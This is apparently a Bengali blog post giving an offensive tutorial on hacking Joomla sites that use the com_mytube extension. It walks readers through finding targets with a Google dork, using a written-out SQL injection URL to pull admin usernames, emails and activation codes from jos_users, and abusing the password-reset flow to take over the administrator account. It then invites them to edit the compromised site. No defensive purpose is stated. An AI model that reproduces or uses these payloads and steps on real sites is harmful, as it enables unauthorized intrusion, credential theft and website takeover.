চলেন দেখি কি ভাবে জুমলা ওয়েবসাইট হ্যাক করতে হই ।
-প্রথমে নিচের Google Dork টি গুগল এ পেস্ট করে সার্চ দিন :inurl:”option=com_mytube”
-গুগল আপনাকে অনেক সাইট এর আনুসন্ধান দিবে ।একটা সাইট কে লক্ষ হিসাবে বেছে নিন।
যেমন :
http://targetsite.com/index.php?option=com_mytube&Itemid=88
-এখন সাইট এর URL এর সাতে নিচের URL টি repels করে দিন
/index.php?option=com_mytube&Itemid=88&view=videos&type=member&
user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%28
0x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22
,23,24,25+from+jos_users+where+id=62–
যেমন :
http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=vide
os&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,
9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,1
6,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–
-যদি আপনার লক্ষ সাইট টি variable হয় তাহলে নিচের এই পেজটি দেখা যাবে
…
-আখেনে username,E-mail,activation code পাবেন ।।এই পেজ টি একটি ট্যাবে ওপেন করে রাখুন ।
ADMIN PASSWORD RESET
-শুদু মাত্র সাইট এর URL এর পরে নিচের URL টি যোগ করুন
/index.php?option=com_user&view=reset
যেমন :
http://www.targetsite.com/index.php?option=com_user&view=reset
-তাহলে নিচের এই পেজ টা পাবেন…………
-এখন আমরা আগে যে E-mail পেয়েছি সেই E-mail দিয়ে Submit করবো
-তাহলে Token no,,username দিতে বলবে ।
-এবার প্রথম ট্যাব টি Reload দিবো
-তাহলে activation code টা reset হইয়ে যাবে ।
(activation code টা হল Token no )
-এখন ,
-Token no,,username দিয়ে submit করুন ……
-যদি সবকিছু ঠিক ভাবে করেন তাহলে password reset অপশন টি পেয়ে যাবেন ।
-এখন নিউ password দিয়ে submit করুন……
-এখন আপনাকে admin panel এ প্রবেশ করতে হবে…
-এখন আপনার সাইট এর URL এর পরে /administrator/ দিয়ে এন্টার দিন ।
যেমন :
http://www.targetsite.com/administrator/
-এখন Admin,password দিয়ে সাইট এ লগইন করুন…………
-তারপর নিজের মত করে editing করুন…………।
************* ENJOY **************
বিঃদ্রিঃ-
(১) যে সাইট গুলা variable শুধু মাত্র সেই সাইট গুলাই হ্যাক করা যাবে।
(২) $1$4411 এই রকম activation code পাওয়া গেলে হ্যাক করা যাবে না।
Posts
Post a Comment